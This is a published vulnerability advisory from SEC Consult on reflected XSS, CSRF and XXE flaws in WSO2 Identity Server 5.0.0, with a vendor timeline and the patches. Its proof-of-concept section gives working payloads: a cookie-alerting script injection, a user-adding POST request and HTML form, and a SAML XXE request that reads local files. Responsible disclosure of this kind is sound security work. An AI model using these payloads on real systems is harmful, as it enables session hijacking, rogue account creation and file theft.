Multiple critical vulnerabilities in WSO2 Identity Server

SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >

=======================================================================

title: Multiple critical vulnerabilities

product: WSO2 Identity Server

other WSO2 Carbon based products may be affected too

vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)

fixed version: 5.0.0 with patches 1194 and 1095 applied

CVE number:

impact: critical

homepage: wso2.com/products/identity-server/

found: 2015-02-19

by: W. Ettlinger (Office Vienna)

SEC Consult Vulnerability Lab

An integrated part of SEC Consult

Berlin - Frankfurt/Main - Montreal - Singapore

Vienna (HQ) - Vilnius - Zurich

www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"WSO2 Identity Server provides sophisticated security and identity management

of enterprise web applications, services, and APIs, and makes life easier for

developers and architects with its hassle-free, minimal monitoring and

maintenance requirements. In its latest version, Identity Server acts as an

Enterprise Identity Bus (EIB) — a central backbone to connect and manage

multiple identities regardless of the standards on which they are based."

 

URL: wso2.com/products/identity-server/

 

Business recommendation:

------------------------

The WSO2 Identity Server has three security vulnerabilities that allow an

attacker to take over administrative user sessions and read arbitrary

local files. Moreover, the XXE vulnerability potentially allows an

attacker to conduct further attacks on internal servers since the

vulnerability may allow an attacker to bypass firewall rules.

 

SEC Consult only conducted a very quick and narrow check on the

WSO2 Identity Server. Since in this check a critical vulnerability was

found, SEC Consult suspects that the Identity Server contains even

more critical vulnerabilities.

 

Since other WSO2 products are based on the same framework (WSO2 Carbon

Framework), it is possible that these or similar vulnerabilities affect

other products too.

 

SEC Consult recommends to not use any products based on the WSO2 Carbon

Framework until a thorough security review has been conducted.

 

Vulnerability overview/description:

-----------------------------------

1) Reflected cross-site scripting (XSS, IDENTITY-3280)

The WSO2 Identity Server is vulnerable to reflected reflected cross-site

scripting vulnerabilities. An attacker can lure a victim, that is logged in

on the Identity Server administration web interface, to e.g. click on a link

and take over the victim's session.

2) Cross-site request forgery (CSRF, IDENTITY-3280)

On at least on one web page, CSRF protection has not been implemented. An

attacker on the internet could lure a victim, that is logged in on the

Identity Server administration web interface, on a web page e.g. containing

a manipulated tag. The attacker is then able to add arbitrary users

to the Identity Server.

3) XML external entitiy injection (XXE, IDENTITY-3192)

An unauthenticated attacker can use the SAML authentication interface to

inject arbitrary external XML entities. This allows an attacker to read

arbitrary local files. Moreover, since the XML entity resolver allows

remote URLs, this vulnerability may allow to bypass firewall rules

and conduct further attacks on internal hosts.

 

Proof of concept:

-----------------

1) Reflected cross-site scripting (XSS, IDENTITY-3280)

When opening the following URL an alert-box is shown as an example:

http:// <host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

When a user without permission to create other users issues the following

request, an alert-box is shown:

---- snip ----
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: <host>:9443
Cookie: <cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
---- snip ----

 

2) Cross-site request forgery (CSRF, IDENTITY-3280)

The following HTML fragment demonstrates this issue:

---- snip ----
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">
 <input type="text" name="domain" value="PRIMARY"/> 
 <input type="text" name="username" value="secconsult"/>
 <input type="text" name="password" value="test123"/>
 <input type="submit"/>
</form>
---- snip ----

 

3) XML external entitiy injection (XXE, IDENTITY-3192)

After issuing the following request to a vulnerable Windows server,

the contents of the C: drive are returned:

---- snip ----
<?xml version="1.0"?>
 <!DOCTYPE AuthnRequest [  
  <!ELEMENT AuthnRequest ANY >
  <!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest 
	xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" 
	Destination="https://<host>/samlsso" 
	ID="_ffffffff-0000-0000-0000-ffffffffffff" 
	IssueInstant="2015-01-01T01:01:01Z" 
	ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" 
	Version="2.0">
 <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  XXXX&xxe;YYYY
 </saml:Issuer>
 <samlp:NameIDPolicy AllowCreate="true" 
	Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
---- snip ----

 

Vulnerable / tested versions:

-----------------------------

The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied)

was found to be vulnerable. This was the latest version at the time

of discovery.

 

Vendor contact timeline:

------------------------

2015-03-19: Contacting vendor through security@wso2.com

2015-03-19: Security contact confirms retrieval of the E-Mail

2015-03-19: Security contact says that he has trouble opening the attached PDF

document

2015-03-19: Sending Responsible Disclosure Policy in plain text

2015-03-20: Security contact states he actually was unable to decrypt the

advisory

2015-03-22: Sending security advisory again

2015-03-22: Security contact confirms retrieval of the advisory

2015-03-26: Security contact acknowledges existence of the vulnerabilities

2015-04-10: Asking for an update on the current status and which products and

versions are affected

2015-04-10: Security contact: XSS vulnerabilities are fixed in the code,

fixing CSRF is in progress,

Identity Server 5.0.0 is vulnerable

2015-04-13: Asking whether the patches will be release before the latest

possible release date; asking for the status of the XXE

vulnerability and whether other products based on Carbon are

affected

2015-04-13: Advisory can be release on 2013-05-07, release notes will mention

the affected products

2015-05-04: Asking for current status

2015-05-04: Security contact: patches will be released in the next couple of

days

2015-05-05: Security contact asks to delay the release of the advisory to

2013-05-13

2015-05-05: Confirming the new release date

2015-05-05: Asking to give credit in the release notes to the patch

2015-05-13: Public release of the advisory

 

Solution:

---------

Apply the following patches to mitigate these issues:

* WSO2-CARBON-PATCH-4.2.0-1194

* WSO2-CARBON-PATCH-4.2.0-1095

See the following pages for more information:

wso2.org/jira/browse/IDENTITY-3280

wso2.org/jira/browse/IDENTITY-3192

 

The patches can be downloaded at

wso2.com/products/identity-server/

Workaround:

-----------

None.

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/en/About/Contact.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

EOF W. Ettlinger / @2015